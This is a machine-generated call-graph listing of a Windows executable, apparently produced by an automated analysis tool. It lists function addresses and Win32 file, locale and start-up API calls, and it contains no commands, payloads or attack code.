41166a 14858->14860 14862 413274 12 API calls 14858->14862 14859 4111cd 14864 411df0 89 API calls 14859->14864 14860->14784 14865 413274 12 API calls 14861->14865 14861->14869 14868 41168f 14862->14868 14863->14869 14867 41123a 14864->14867 14872 4118f8 14865->14872 14866->14784 14870 411245 14867->14870 14871 4113b4 14867->14871 14873 41169b 14868->14873 14894 4116b9 14868->14894 14869->14784 14876 411278 14870->14876 14877 41124e 14870->14877 14879 411440 14871->14879 14880 4113c9 14871->14880 14875 411901 14872->14875 14890 41338f 6 API calls 14872->14890 14922 41194f 14872->14922 14878 413326 ___free_lc_time 7 API calls 14873->14878 14874 412920 26 API calls 14874->14881 14875->14784 14886 4112dd 14876->14886 14887 41127c 14876->14887 14882 413326 ___free_lc_time 7 API calls 14877->14882 14884 4116a6 14878->14884 14883 411368 14879->14883 14889 406640 3 API calls 14879->14889 14885 406640 3 API calls 14880->14885 14881->14849 14881->14857 14881->14874 14891 41125a 14882->14891 14883->14784 14884->14784 14892 4113da 14885->14892 15055 41c5bf CreateDirectoryA 14886->15055 14893 406640 3 API calls 14887->14893 14898 41145a 14889->14898 14890->14922 14899 413326 ___free_lc_time 7 API calls 14891->14899 14901 406640 3 API calls 14892->14901 14902 41128f 14893->14902 14895 4116fe GetFullPathNameA 14894->14895 14900 4117ab 14894->14900 14903 4116ef 14894->14903 14896 41171f 14895->14896 14917 4116f9 14895->14917 14904 412920 26 API calls 14896->14904 14897 4112e9 14897->14883 14911 406640 3 API calls 14897->14911 14905 412920 26 API calls 14898->14905 14906 411265 14899->14906 14900->14784 14907 4113ee 14901->14907 14908 412920 26 API calls 14902->14908 15058 413b4f 14903->15058 14910 411730 14904->14910 14913 41146a 14905->14913 14906->14784 14914 412920 26 API calls 14907->14914 14915 41129f 14908->14915 14910->14784 14916 411302 14911->14916 14912 41179e 14912->14900 14918 413326 ___free_lc_time 7 API calls 14912->14918 14925 413326 ___free_lc_time 7 API calls 14913->14925 14919 411401 14914->14919 14928 413326 ___free_lc_time 7 API calls 14915->14928 14920 406640 3 API calls 14916->14920 14917->14900 14917->14912 15064 411b10 GetDriveTypeA 14917->15064 14921 4117b9 14918->14921 14935 413326 ___free_lc_time 7 API calls 14919->14935 14923 411317 14920->14923 14926 413326 ___free_lc_time 7 API calls 14921->14926 14927 4119ae 14922->14927 14934 411df0 89 API calls 14922->14934 14930 412920 26 API calls 14923->14930 14932 41148a 14925->14932 14933 4117c5 14926->14933 14931 414564 24 API calls 14927->14931 14929 4112bf 14928->14929 14937 413326 ___free_lc_time 7 API calls 14929->14937 14938 41132a 14930->14938 14939 411aa5 14931->14939 14940 413326 ___free_lc_time 7 API calls 14932->14940 14933->14784 14941 4119dd 14934->14941 14936 411421 14935->14936 14942 413326 ___free_lc_time 7 API calls 14936->14942 14943 4112ca 14937->14943 14949 413326 ___free_lc_time 7 API calls 14938->14949 14939->14869 14946 413326 ___free_lc_time 7 API calls 14939->14946 14944 411496 14940->14944 14941->14927 14947 411a22 14941->14947 14948 411a04 14941->14948 14945 41142d 14942->14945 14943->14784 14944->14784 14945->14784 14950 411ab7 14946->14950 14952 41c5bf 2 API calls 14947->14952 14951 413326 ___free_lc_time 7 API calls 14948->14951 14953 411349 14949->14953 14950->14784 14954 411a09 14951->14954 14955 411a27 14952->14955 14957 413326 ___free_lc_time 7 API calls 14953->14957 14954->14784 14955->14927 14956 411a2f 14955->14956 14958 406640 3 API calls 14956->14958 14959 411355 14957->14959 14960 411a3c 14958->14960 14959->14784 14961 412920 26 API calls 14960->14961 14962 411a4c 14961->14962 14963 413326 ___free_lc_time 7 API calls 14962->14963 14964 411a66 14963->14964 14964->14784 14966 40b1a5 14965->14966 14967 40b0c8 14965->14967 14971 41908b 2 API calls 14966->14971 14984 40b1e9 14966->14984 14968 41908b 2 API calls 14967->14968 14969 40b0d5 14968->14969 14970 41b5e5 6 API calls 14969->14970 14983 40b0ee 14970->14983 14973 40b1d1 14971->14973 14972 40b14e 15065 4068d0 14972->15065 14975 41b5e5 6 API calls 14973->14975 14974 40b149 14978 40b3a7 14974->14978 14979 412920 26 API calls 14974->14979 14975->14984 14977 41908b 2 API calls 14977->14984 14981 412920 26 API calls 14978->14981 14979->14978 14980 41b5e5 6 API calls 14980->14984 14982 40b3d2 14981->14982 14982->14785 14983->14972 14983->14974 14984->14972 14984->14974 14984->14977 14984->14980 14984->14983 14985 40b18e 14985->14785 14987 40c48c 14986->14987 14988 40c4e4 14986->14988 14994 412920 26 API calls 14987->14994 14989 40c50a 14988->14989 14990 40c7af 14988->14990 14992 412920 26 API calls 14989->14992 14991 40c6e9 14990->14991 14995 407860 51 API calls 14990->14995 14991->14783 14993 40c51b 14992->14993 14997 412920 26 API calls 14993->14997 14994->14988 14996 40c7d7 14995->14996 14996->14991 14998 412920 26 API calls 14996->14998 14999 40c543 14997->14999 15000 40c7f6 14998->15000 15001 412920 26 API calls 14999->15001 15000->14783 15002 40c579 15001->15002 15003 40c5fa 15002->15003 15004 40c59a 15002->15004 15006 412920 26 API calls 15003->15006 15005 412920 26 API calls 15004->15005 15010 40c5d0 15005->15010 15007 40c63b 15006->15007 15008 412920 26 API calls 15007->15008 15008->15010 15009 412920 26 API calls 15011 40c6b7 15009->15011 15010->15009 15012 412920 26 API calls 15011->15012 15020 40c6da 15011->15020 15013 40c719 15012->15013 15015 412920 26 API calls 15013->15015 15014 412920 26 API calls 15014->14991 15016 40c741 15015->15016 15069 407860 15016->15069 15018 40c767 15019 412920 26 API calls 15018->15019 15019->15020 15020->14991 15020->15014 15022 40b503 15021->15022 15023 40b49d 15021->15023 15022->14801 15023->15022 15024 407860 51 API calls 15023->15024 15025 40b4ca 15024->15025 15025->15022 15026 412920 26 API calls 15025->15026 15027 40b4e5 15026->15027 15027->14801 15029 40fdc0 36 API calls 15028->15029 15030 410142 CreateFileA 15029->15030 15031 410165 15030->15031 15032 41016e 15030->15032 15031->14831 15033 40fce0 55 API calls 15032->15033 15034 410183 15032->15034 15033->15034 15035 41019a SetFileTime 15034->15035 15036 4101b1 15035->15036 15037 4101b4 CloseHandle 15035->15037 15036->15037 15037->14831 15039 406af7 15038->15039 15040 406b42 15039->15040 15041 406b07 15039->15041 15042 406b9f 15040->15042 15044 41908b 2 API calls 15040->15044 15043 412920 26 API calls 15041->15043 15042->14824 15045 406b24 15043->15045 15046 406b58 15044->15046 15045->14824 15047 41b5e5 6 API calls 15046->15047 15048 406b75 15047->15048 15048->14824 15050 413274 12 API calls 15049->15050 15051 40230a 15050->15051 15051->14839 15053 4101d0 36 API calls 15052->15053 15054 41110a 15053->15054 15054->14859 15056 41c5cf GetLastError 15055->15056 15057 41c5d7 15055->15057 15056->15057 15057->14897 15060 413b7c 15058->15060 15063 413b5f 15058->15063 15059 413b9a 15062 41918f 9 API calls 15059->15062 15059->15063 15060->15059 15061 41338f 6 API calls 15060->15061 15061->15059 15062->15063 15063->14917 15064->14912 15067 4068e4 15065->15067 15068 406978 15065->15068 15066 41b5e5 6 API calls 15066->15067 15067->15066 15067->15068 15068->14985 15070 407873 15069->15070 15071 40787b 15069->15071 15070->15018 15072 407ce7 15071->15072 15073 407c61 15071->15073 15074 407a5d 15071->15074 15101 40788f 15071->15101 15106 407c16 15071->15106 15072->15018 15075 407c70 15073->15075 15079 413326 ___free_lc_time 7 API calls 15073->15079 15081 412920 26 API calls 15074->15081 15083 407a79 15074->15083 15080 413274 12 API calls 15075->15080 15076 407a18 15076->15018 15077 406ae0 30 API calls 15078 407c54 15077->15078 15078->15018 15079->15075 15082 407c79 15080->15082 15081->15083 15085 407ce0 15082->15085 15086 407c85 15082->15086 15084 4068d0 6 API calls 15083->15084 15091 407ab8 15084->15091 15087 4068d0 6 API calls 15085->15087 15088 412920 26 API calls 15086->15088 15087->15072 15090 407c9a 15088->15090 15089 4068d0 6 API calls 15089->15101 15093 406ae0 30 API calls 15090->15093 15091->15076 15092 407b09 OemToCharA 15091->15092 15100 407b1f 15091->15100 15092->15100 15094 407cd3 15093->15094 15094->15018 15095 407940 OemToCharA 15098 40794d CharToOemA 15095->15098 15096 413755 2 API calls 15096->15100 15097 407bb7 15097->15072 15099 406640 3 API calls 15097->15099 15098->15101 15102 407c06 15099->15102 15100->15096 15100->15097 15104 41338f 6 API calls 15100->15104 15105 413b4f 15 API calls 15100->15105 15101->15076 15101->15089 15101->15095 15101->15098 15103 412920 26 API calls 15102->15103 15103->15106 15104->15100 15105->15100 15106->15077 15292 413847 15293 413853 GetCurrentProcess TerminateProcess 15292->15293 15296 413864 15292->15296 15293->15296 15294 4138de 15295 4138ce ExitProcess 15296->15294 15296->15295 15671 405848 15672 405853 15671->15672 15676 4058bd 15671->15676 15675 406640 3 API calls 15672->15675 15672->15676 15673 405938 15674 405973 15673->15674 15690 40f740 15673->15690 15681 406640 3 API calls 15674->15681 15679 4058a5 15675->15679 15676->15673 15677 4059dc 15676->15677 15678 40590f 15676->15678 15685 406640 3 API calls 15677->15685 15684 412920 26 API calls 15678->15684 15682 412920 26 API calls 15679->15682 15683 40599d 15681->15683 15682->15676 15686 412920 26 API calls 15683->15686 15684->15673 15687 4059ff 15685->15687 15689 4059ad 15686->15689 15688 412920 26 API calls 15687->15688 15688->15673 15691 4144da 16 API calls 15690->15691 15692 40f751 15691->15692 15693 40f974 15692->15693 15694 40fb60 71 API calls 15692->15694 15693->15674 15695 40f775 CreateFileA 15694->15695 15696 40f7ea 15695->15696 15697 40f7ac SetFileAttributesA 15695->15697 15699 40f8b7 15696->15699 15703 40fac0 GetVersion 15696->15703 15697->15696 15698 40f7bf GetLastError 15697->15698 15702 412920 26 API calls 15698->15702 15700 40f8d3 GetLastError 15699->15700 15701 40f905 15699->15701 15704 412920 26 API calls 15700->15704 15705 40f909 SetFileTime 15701->15705 15706 40f96d CloseHandle 15701->15706 15707 40f7d3 15702->15707 15708 40f814 15703->15708 15709 40f8e7 15704->15709 15705->15706 15710 40f943 GetLastError 15705->15710 15706->15693 15707->15696 15708->15699 15712 40f980 70 API calls 15708->15712 15709->15674 15711 412920 26 API calls 15710->15711 15714 40f956 15711->15714 15713 40f83d 15712->15713 15713->15699 15715 40f873 15713->15715 15716 406640 3 API calls 15713->15716 15714->15706 15718 412920 26 API calls 15715->15718 15717 40f863 15716->15717 15719 412920 26 API calls 15717->15719 15718->15699 15719->15715 14370 406760 14392 411df0 14370->14392 14372 40676f 14373 4067be 14372->14373 14374 406791 14372->14374 14375 40677f 14372->14375 14414 41391a 14373->14414 14432 41c068 14374->14432 14426 41c073 GetFileAttributesA 14375->14426 14380 40678e 14380->14374 14382 4067d9 14386 406640 3 API calls 14382->14386 14383 40681a 14417 40f6d0 14383->14417 14385 4067a2 14388 406640 3 API calls 14385->14388 14389 4067b6 14386->14389 14387 406827 14388->14389 14390 412920 26 API calls 14389->14390 14391 4067fd 14390->14391 14435 41c29c 14392->14435 14395 411e10 14397 40fdc0 36 API calls 14395->14397 14396 411f48 GetFileAttributesA 14398 411f94 14396->14398 14399 411f56 14396->14399 14400 411e17 CreateFileA 14397->14400 14398->14372 14399->14398 14403 407730 55 API calls 14399->14403 14401 411e40 GetFileTime CloseHandle 14400->14401 14402 411f3e 14400->14402 14401->14402 14404 411e67 14401->14404 14402->14372 14405 411f70 14403->14405 14413 411e74 14404->14413 14472 412020 FileTimeToLocalFileTime 14404->14472 14405->14372 14407 411ee3 14408 411ef6 14407->14408 14409 412020 57 API calls 14407->14409 14410 411f1e 14408->14410 14411 412020 57 API calls 14408->14411 14409->14408 14410->14372 14412 411f3b 14411->14412 14412->14402 14413->14372 14547 4138fa 14414->14547 14416 4067cd 14416->14382 14416->14383 14418 40f6b0 GetVersion 14417->14418 14420 40f6d7 14418->14420 14419 40f6db 14419->14387 14420->14419 14421 40f6ee SetFilePointer 14420->14421 14422 40f70a 14421->14422 14423 40f70f SetEndOfFile 14421->14423 14422->14387 14424 40f720 SetFilePointer 14423->14424 14425 40f71a 14423->14425 14424->14387 14425->14387 14427 41c082 SetFileAttributesA 14426->14427 14428 41c09e GetLastError 14426->14428 14427->14428 14431 41c0af 14427->14431 14429 41c0aa 14428->14429 14429->14380 14431->14380 14616 41c03e DeleteFileA 14432->14616 14434 40679b 14434->14373 14434->14385 14436 41c2b6 14435->14436 14437 41c2f3 14436->14437 14438 41c2c4 14436->14438 14471 411e05 14436->14471 14485 41ca52 GetCurrentDirectoryA 14437->14485 14438->14471 14481 41ca95 14438->14481 14441 41c2f8 FindFirstFileA 14443 41c3be FileTimeToLocalFileTime 14441->14443 14447 41c317 14441->14447 14444 41c532 GetLastError 14443->14444 14445 41c3d7 FileTimeToSystemTime 14443->14445 14514 419c07 14444->14514 14445->14444 14448 41c3ed 14445->14448 14447->14471 14489 41c9af 14447->14489 14450 419a07 52 API calls 14448->14450 14452 41c411 14450->14452 14453 41c42a FileTimeToLocalFileTime 14452->14453 14454 41c47d 14452->14454 14453->14444 14455 41c443 FileTimeToSystemTime 14453->14455 14457 41c498 FileTimeToLocalFileTime 14454->14457 14459 41c493 FindClose 14454->14459 14455->14444 14456 41c459 14455->14456 14458 419a07 52 API calls 14456->14458 14457->14444 14460 41c4b1 FileTimeToSystemTime 14457->14460 14458->14454 14467 41c4f6 14459->14467 14460->14444 14464 41c4c3 14460->14464 14461 41c33e 14462 41c35e GetDriveTypeA 14461->14462 14461->14471 14465 41c36a 14462->14465 14462->14471 14466 419a07 52 API calls 14464->14466 14468 419a07 52 API calls 14465->14468 14466->14459 14504 41c1e4 14467->14504 14470 41c398 14468->14470 14470->14467 14471->14395 14471->14396 14473 412046 FileTimeToSystemTime 14472->14473 14474 412038 14472->14474 14476 41210d 14473->14476 14478 412064 14473->14478 14475 413f9e 55 API calls 14474->14475 14477 41203e 14475->14477 14476->14407 14477->14407 14478->14476 14479 413c4c 52 API calls 14478->14479 14480 4120f5 14479->14480 14480->14407 14482 41caa5 14481->14482 14484 41c2ed 14481->14484 14483 41918f 9 API calls 14482->14483 14482->14484 14483->14484 14484->14441 14486 41ca8a 14485->14486 14487 41ca74 14485->14487 14486->14441 14487->14486 14516 41bd99 14487->14516 14490 41ca41 14489->14490 14491 41c9bf 14489->14491 14522 41ccf4 14490->14522 14491->14490 14493 41c9c4 14491->14493 14494 41c9ef GetFullPathNameA 14493->14494 14496 413274 12 API calls 14493->14496 14495 41ca03 14494->14495 14500 41ca1c 14494->14500 14498 41c9dc 14495->14498 14499 413326 ___free_lc_time 7 API calls 14495->14499 14497 41c9d5 14496->14497 14497->14494 14497->14498 14498->14461 14499->14498 14500->14498 14501 41ca2c GetLastError 14500->14501 14502 413326 ___free_lc_time 7 API calls 14500->14502 14501->14498 14503 41ca2b 14502->14503 14503->14501 14505 41c1fb 14504->14505 14506 41c27c 14505->14506 14537 41c841 14505->14537 14506->14471 14509 41c841 15 API calls 14510 41c25a 14509->14510 14510->14506 14511 41c841 15 API calls 14510->14511 14512 41c26b 14511->14512 14512->14506 14513 41c841 15 API calls 14512->14513 14513->14506 14515 419c18 FindClose 14514->14515 14515->14471 14518 41bdc4 14516->14518 14521 41bda7 14516->14521 14517 41bde0 14520 41918f 9 API calls 14517->14520 14517->14521 14518->14517 14519 41338f 6 API calls 14518->14519 14519->14517 14520->14521 14521->14486 14525 41cd07 14522->14525 14524 41cd03 14524->14498 14526 41cd18 14525->14526 14527 41cd6a GetCurrentDirectoryA 14525->14527 14534 41cdd8 14526->14534 14531 41cd7c 14527->14531 14530 41cd3c GetFullPathNameA 14530->14531 14532 413274 12 API calls 14531->14532 14533 41cd23 14531->14533 14532->14533 14533->14524 14535 41cde2 GetDriveTypeA 14534->14535 14536 41cd1e 14534->14536 14535->14536 14536->14530 14536->14533 14538 41c853 14537->14538 14542 41c865 14537->14542 14543 41a950 14538->14543 14540 41c249 14540->14506 14540->14509 14541 41918f 9 API calls 14541->14542 14542->14540 14542->14541 14544 41a968 14543->14544 14545 41a9a3 14543->14545 14544->14540 14545->14544 14546 413b4f 15 API calls 14545->14546 14546->14545 14553 418fbc 14547->14553 14549 413903 14549->14416 14554 418fd0 14553->14554 14555 4138ff 14553->14555 14554->14555 14556 413274 12 API calls 14554->14556 14555->14549 14557 418e4c 14555->14557 14556->14555 14560 418e6b 14557->14560 14558 413916 14558->14416 14560->14558 14561 41b7f2 14560->14561 14562 41b80f 14561->14562 14563 41b84e 14562->14563 14582 414317 14562->14582 14563->14558 14566 41b98b CreateFileA 14567 41b9aa GetFileType 14566->14567 14568 41b9bc GetLastError 14566->14568 14569 41b9d0 14567->14569 14570 41b9b5 CloseHandle 14567->14570 14568->14563 14586 4143ac 14569->14586 14570->14568 14573 41908b 2 API calls 14574 41ba29 14573->14574 14575 41ba34 14574->14575 14590 41b5e5 14574->14590 14575->14563 14579 419c6e 3 API calls 14575->14579 14577 41ba52 14578 41ba68 14577->14578 14600 41be65 14577->14600 14578->14575 14580 41908b 2 API calls 14578->14580 14579->14563 14580->14575 14584 414326 14582->14584 14583 413274 12 API calls 14585 414361 14583->14585 14584->14583 14584->14585 14585->14563 14585->14566 14587 414402 14586->14587 14588 4143ba 14586->14588 14587->14563 14587->14573 14588->14587 14589 4143fc SetStdHandle 14588->14589 14589->14587 14591 41b5fd 14590->14591 14594 41b680 14590->14594 14592 41b65a ReadFile 14591->14592 14591->14594 14593 41b673 GetLastError 14592->14593 14596 41b6ad 14592->14596 14593->14594 14594->14577 14595 41b726 ReadFile 14597 41b744 GetLastError 14595->14597 14598 41b74e 14595->14598 14596->14594 14596->14595 14597->14598 14598->14596 14599 41908b 2 API calls 14598->14599 14599->14598 14601 41be72 14600->14601 14602 41908b 2 API calls 14601->14602 14611 41bf92 14601->14611 14603 41beaa 14602->14603 14604 41908b 2 API calls 14603->14604 14603->14611 14605 41bec2 14604->14605 14606 41bf47 14605->14606 14605->14611 14615 41bed8 14605->14615 14607 41bf24 14606->14607 14608 41908b 2 API calls 14606->14608 14609 41908b 2 API calls 14607->14609 14610 41bf54 14608->14610 14609->14611 14612 41bf5a SetEndOfFile 14610->14612 14611->14578 14612->14607 14613 41bf72 GetLastError 14612->14613 14613->14607 14614 415612 6 API calls 14614->14615 14615->14607 14615->14614 14617 41c04c GetLastError 14616->14617 14618 41c054 14616->14618 14617->14618 14618->14434 15406 414878 GetVersion 15417 417635 HeapCreate 15406->15417 15408 4148d6 15429 418ac8 15408->15429 15410 4148ec GetCommandLineA 15443 41a052 15410->15443 15414 414906 15475 419d4c 15414->15475 15416 41490b 15418 417655 15417->15418 15419 41768b 15417->15419 15488 4174ed 15418->15488 15419->15408 15422 417671 15425 41768e 15422->15425 15426 4181d9 5 API calls 15422->15426 15423 417664 15500 417692 HeapAlloc 15423->15500 15425->15408 15427 41766e 15426->15427 15427->15425 15428 41767f HeapDestroy 15427->15428 15428->15419 15430 413274 12 API calls 15429->15430 15431 418ad9 15430->15431 15432 414957 7 API calls 15431->15432 15433 418ae7 GetStartupInfoA 15431->15433 15432->15433 15439 418bf8 15433->15439 15442 418b33 15433->15442 15435 418c1f GetStdHandle 15437 418c2d GetFileType 15435->15437 15435->15439 15436 418c5f SetHandleCount 15436->15410 15437->15439 15438 413274 12 API calls 15438->15442 15439->15435 15439->15436 15440 418ba4 15440->15439 15441 418bc6 GetFileType 15440->15441 15441->15440 15442->15438 15442->15439 15442->15440 15444 41a0a0 15443->15444 15445 41a06d GetEnvironmentStringsW 15443->15445 15447 41a075 15444->15447 15448 41a091 15444->15448 15446 41a081 GetEnvironmentStrings 15445->15446 15445->15447 15446->15448 15451 4148fc 15446->15451 15449 41a0b9 WideCharToMultiByte 15447->15449 15450 41a0ad GetEnvironmentStringsW 15447->15450 15448->15451 15452 41a133 GetEnvironmentStrings 15448->15452 15453 41a13f 15448->15453 15455 41a0ed 15449->15455 15456 41a11f FreeEnvironmentStringsW 15449->15456 15450->15449 15450->15451 15466 419e05 15451->15466 15452->15451 15452->15453 15457 413274 12 API calls 15453->15457 15458 413274 12 API calls 15455->15458 15456->15451 15464 41a15a 15457->15464 15459 41a0f3 15458->15459 15459->15456 15460 41a0fc WideCharToMultiByte 15459->15460 15461 41a116 15460->15461 15462 41a10d 15460->15462 15461->15456 15465 413326 ___free_lc_time 7 API calls 15462->15465 15463 41a170 FreeEnvironmentStringsA 15463->15451 15464->15463 15465->15461 15467 419e17 15466->15467 15468 419e1c GetModuleFileNameA 15466->15468 15516 4155f6 15467->15516 15470 419e3f 15468->15470 15471 413274 12 API calls 15470->15471 15472 419e60 15471->15472 15473 414957 7 API calls 15472->15473 15474 419e70 15472->15474 15473->15474 15474->15414 15476 419d59 15475->15476 15479 419d5e 15475->15479 15477 4155f6 19 API calls 15476->15477 15477->15479 15478 413274 12 API calls 15480 419d8b 15478->15480 15479->15478 15481 414957 7 API calls 15480->15481 15487 419d9f 15480->15487 15481->15487 15482 419de2 15483 413326 ___free_lc_time 7 API calls 15482->15483 15484 419dee 15483->15484 15484->15416 15485 413274 12 API calls 15485->15487 15486 414957 7 API calls 15486->15487 15487->15482 15487->15485 15487->15486 15502 41b280 15488->15502 15491 417530 GetEnvironmentVariableA 15495 41754f 15491->15495 15499 41760d 15491->15499 15492 417516 15492->15491 15493 417528 15492->15493 15493->15422 15493->15423 15496 417594 GetModuleFileNameA 15495->15496 15497 41758c 15495->15497 15496->15497 15497->15499 15504 41afdb 15497->15504 15499->15493 15507 4174c0 GetModuleHandleA 15499->15507 15501 4176ae 15500->15501 15501->15427 15503 4174fa GetVersionExA 15502->15503 15503->15491 15503->15492 15509 41aff2 15504->15509 15508 4174d7 15507->15508 15508->15493 15511 41b00a 15509->15511 15510 41338f 6 API calls 15510->15511 15511->15510 15513 41b03a 15511->15513 15512 41338f 6 API calls 15512->15513 15513->15512 15514 41bd99 15 API calls 15513->15514 15515 41afee 15513->15515 15514->15513 15515->15499 15517 4155ff 15516->15517 15519 415606 15516->15519 15520 415232 15517->15520 15519->15468 15527 4153cb 15520->15527 15522 4153bf 15522->15519 15524 415275 GetCPInfo 15526 415289 15524->15526 15526->15522 15532 415471 GetCPInfo 15526->15532 15528 4153eb 15527->15528 15529 4153db GetOEMCP 15527->15529 15530 4153f0 GetACP 15528->15530 15531 415243 15528->15531 15529->15528 15530->15531 15531->15522 15531->15524 15531->15526 15533 41555c 15532->15533 15536 415494 15532->15536 15533->15522 15534 4188a6 6 API calls 15535 415510 15534->15535 15537 41918f 9 API calls 15535->15537 15536->15534 15538 415534 15537->15538 15539 41918f 9 API calls 15538->15539 15539->15533 14619 407200 14620 40722d 14619->14620 14642 411da0 GetStdHandle GetConsoleScreenBufferInfo 14620->14642 14623 4072a5 14644 41392d 14623->14644 14624 413a3a 18 API calls 14624->14623 14626 407468 14629 415612 6 API calls 14626->14629 14634 407506 14626->14634 14627 407368 14627->14626 14630 415612 6 API calls 14627->14630 14633 41392d 8 API calls 14627->14633 14627->14634 14628 4072c2 14628->14627 14635 407339 14628->14635 14636 413a3a 18 API calls 14628->14636 14631 407493 14629->14631 14630->14627 14632 41392d 8 API calls 14631->14632 14631->14634 14638 4074a9 14632->14638 14633->14627 14637 41392d 8 API calls 14635->14637 14636->14635 14637->14627 14638->14634 14639 415612 6 API calls 14638->14639 14640 4074ec 14639->14640 14640->14634 14641 41392d 8 API calls 14640->14641 14641->14634 14643 407275 14642->14643 14643->14623 14643->14624 14643->14627 14645 413936 14644->14645 14646 41393f 14644->14646 14654 4139cd 14645->14654 14648 413968 6 API calls 14646->14648 14650 413945 14648->14650 14651 41394a 14650->14651 14658 419034 14650->14658 14651->14628 14655 41393c 14654->14655 14656 4139de 14654->14656 14655->14628 14656->14655 14657 41392d 8 API calls 14656->14657 14657->14656 14659 41395d 14658->14659 14660 419040 14658->14660 14659->14628 14660->14659 14661 41905e FlushFileBuffers 14660->14661 14661->14659 14662 41906a GetLastError 14661->14662 14662->14659 16439 40490b 16440 412920 26 API calls 16439->16440 16441 40492c 16440->16441 16442 412920 26 API calls 16441->16442 16449 404713 16441->16449 16445 404987 16442->16445 16443 4051c2 16444 41908b 2 API calls 16444->16449 16446 406ae0 30 API calls 16445->16446 16448 4049d2 16446->16448 16447 41b5e5 6 API calls 16447->16449 16448->16449 16450 4068d0 6 API calls 16448->16450 16449->16443 16449->16444 16449->16447 16451 412920 26 API calls 16449->16451 16453 4068d0 6 API calls 16449->16453 16452 4049e5 16450->16452 16451->16449 16452->16449 16457 40b740 16452->16457 16453->16449 16455 404a60 16456 412920 26 API calls 16455->16456 16456->16449 16458 4068d0 6 API calls 16457->16458 16459 40b74f 16458->16459 16459->16455 15540 40a91f 15543 4066f0 15540->15543 15542 40a929 15549 41b7db 15543->15549 15545 406752 15545->15542 15546 406700 15546->15545 15547 412920 26 API calls 15546->15547 15548 406735 15547->15548 15548->15542 15550 41b7f2 32 API calls 15549->15550 15551 41b7ee 15550->15551 15551->15546 15402 406c28 15403 406c2f 15402->15403 15405 406c46 15402->15405 15404 415612 6 API calls 15403->15404 15404->15405 14663 412bc1 14664 412bf5 14663->14664 14665 412bda 14663->14665 14665->14664 14666 412be7 14665->14666 14670 412c0b 14665->14670 14666->14664 14682 412dc7 14666->14682 14668 412ee2 19 API calls 14668->14664 14669 412d30 14692 412f9b 14669->14692 14670->14669 14672 412c3d 14670->14672 14680 412d1f 14670->14680 14672->14664 14672->14680 14681 412dc7 44 API calls 14672->14681 14673 412d8f 14674 412d96 14673->14674 14673->14680 14696 412ee2 14674->14696 14675 412d40 14675->14664 14675->14673 14677 412dc7 44 API calls 14675->14677 14677->14675 14678 412d9b 14679 413326 ___free_lc_time 7 API calls 14678->14679 14679->14664 14680->14664 14680->14668 14681->14672 14683 412f9b 25 API calls 14682->14683 14684 412dee 14683->14684 14685 413274 12 API calls 14684->14685 14691 412eb3 14684->14691 14686 412e0c 14685->14686 14687 412ea2 14686->14687 14688 412ec5 14686->14688 14686->14691 14689 413326 ___free_lc_time 7 API calls 14687->14689 14690 413326 ___free_lc_time 7 API calls 14688->14690 14688->14691 14689->14691 14690->14691 14691->14664 14693 412fb4 14692->14693 14695 412fbe 14692->14695 14693->14695 14703 416af5 14693->14703 14695->14675 14697 412ef2 14696->14697 14699 412efc 14696->14699 14698 413274 12 API calls 14697->14698 14698->14699 14700 412f7c 14699->14700 14701 413326 ___free_lc_time 7 API calls 14699->14701 14700->14678 14702 412f8d 14701->14702 14702->14678 14704 416b21 14703->14704 14705 416b02 14703->14705 14707 416bad 14704->14707 14709 416b48 14704->14709 14739 416c72 14704->14739 14737 417226 GetVersionExA 14705->14737 14755 417125 GetUserDefaultLCID 14707->14755 14712 416b6c 14709->14712 14717 416c72 15 API calls 14709->14717 14714 416b9e 14712->14714 14715 416b88 14712->14715 14713 416b95 14730 416c55 14713->14730 14731 41713f 14713->14731 14714->14707 14720 416ba6 14714->14720 14718 416b97 14715->14718 14721 416b90 14715->14721 14717->14712 14747 416f55 14718->14747 14751 417068 14720->14751 14743 416cca 14721->14743 14722 416bd5 IsValidCodePage 14726 416be7 IsValidLocale 14722->14726 14722->14730 14727 416bf9 14726->14727 14726->14730 14728 416c22 GetLocaleInfoA 14727->14728 14727->14730 14729 416c3a GetLocaleInfoA 14728->14729 14728->14730 14729->14730 14730->14695 14736 41714c 14731->14736 14732 417188 GetLocaleInfoA 14733 416bca 14732->14733 14734 417198 14732->14734 14733->14722 14733->14730 14735 41aa8d 6 API calls 14734->14735 14735->14733 14736->14732 14736->14734 14738 416b07 14737->14738 14738->14704 14740 416cc5 14739->14740 14742 416c82 14739->14742 14740->14709 14741 41a950 15 API calls 14741->14742 14742->14740 14742->14741 14744 416cd5 14743->14744 14745 416d29 EnumSystemLocalesA 14744->14745 14746 416d40 14745->14746 14746->14713 14748 416f60 14747->14748 14749 416f8d EnumSystemLocalesA 14748->14749 14750 416fa3 14749->14750 14750->14713 14756 4157c0 14751->14756 14754 417097 14754->14713 14755->14713 14757 4157cc EnumSystemLocalesA 14756->14757 14757->14754 14758 4069c0 14759 4069d3 14758->14759 14760 4069cd 14758->14760 14761 4069dc 14759->14761 14762 41b5e5 6 API calls 14759->14762 14763 406a11 14762->14763 14763->14761 14765 413825 14763->14765 14768 413847 14765->14768 14769 413853 GetCurrentProcess TerminateProcess 14768->14769 14772 413864 14768->14772 14769->14772 14770 413832 14770->14761 14771 4138ce ExitProcess 14772->14770 14772->14771 15297 403996 15298 4039a0 15297->15298 15299 4039f9 15298->15299 15300 413274 12 API calls 15298->15300 15301 413274 12 API calls 15299->15301 15314 403a36 15299->15314 15300->15299 15301->15314 15302 4068d0 6 API calls 15302->15314 15304 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 15304->15314 15305 41908b 2 API calls 15305->15314 15306 407860 51 API calls 15306->15314 15307 403e37 15310 403ebd 15307->15310 15311 413274 12 API calls 15307->15311 15308 41b5e5 6 API calls 15308->15314 15309 412920 26 API calls 15309->15314 15312 40404f 15310->15312 15332 403ff5 15310->15332 15337 40404a 15310->15337 15313 403e62 15311->15313 15315 413326 ___free_lc_time 7 API calls 15312->15315 15317 403e6f 15313->15317 15325 403ec2 15313->15325 15314->15302 15314->15304 15314->15305 15314->15306 15314->15307 15314->15308 15314->15309 15320 409fb0 17 API calls 15314->15320 15321 404340 29 API calls 15314->15321 15362 40b510 15314->15362 15315->15337 15316 4040c8 15323 40411c 15316->15323 15324 412920 26 API calls 15316->15324 15347 40428d 15316->15347 15319 412920 26 API calls 15317->15319 15318 4040c2 15322 413326 ___free_lc_time 7 API calls 15318->15322 15346 403e83 15319->15346 15320->15314 15321->15314 15322->15316 15334 404162 15323->15334 15343 404292 15323->15343 15323->15347 15331 4040f1 15324->15331 15325->15325 15327 403f88 15325->15327 15354 403f1a 15325->15354 15326 412920 26 API calls 15326->15332 15329 413326 ___free_lc_time 7 API calls 